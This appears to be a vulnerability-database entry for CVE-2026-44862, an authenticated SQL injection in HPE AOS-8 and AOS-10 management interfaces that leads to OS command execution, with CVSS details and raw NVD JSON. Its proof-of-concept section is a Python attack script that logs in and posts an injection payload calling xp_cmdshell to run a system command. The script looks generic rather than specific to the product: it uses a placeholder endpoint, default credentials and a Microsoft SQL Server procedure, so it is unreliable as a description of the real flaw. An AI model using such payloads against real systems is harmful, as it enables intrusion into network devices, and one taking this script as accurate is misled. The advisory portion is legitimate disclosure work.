Security Vulnerability Report
中文
CVE-2026-44862 CVSS 7.2 HIGH

CVE-2026-44862

Published: 2026-05-12 20:16:45
Last Modified: 2026-05-12 20:16:45

Description

SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE AOS-8 (具体版本请参考厂商公告)
HPE AOS-10 (具体版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-44862 # This script demonstrates the concept of SQL Injection in HPE AOS CLI/Management API. # Requires administrative credentials. import requests # Target URL (Example) target_url = "https://<target-ip>/api/v1/management/endpoint" # Attacker credentials (Admin) username = "admin" password = "password" # Malicious payload designed to trigger SQL Injection # Attempting to execute a system command (e.g., 'id') payload = "' OR 1=1; EXEC xp_cmdshell('id'); --" # Data payload data = { "service_name": payload, "action": "query" } try: session = requests.Session() # Login login_data = {"username": username, "password": password} session.post(f"{target_url}/login", data=login_data) # Send exploit request response = session.post(target_url, json=data) if response.status_code == 200: print("[+] Payload sent successfully.") print(f"[+] Response: {response.text}") else: print("[-] Failed to send payload.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44862", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:44.820", "lastModified": "2026-05-12T20:16:44.820", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}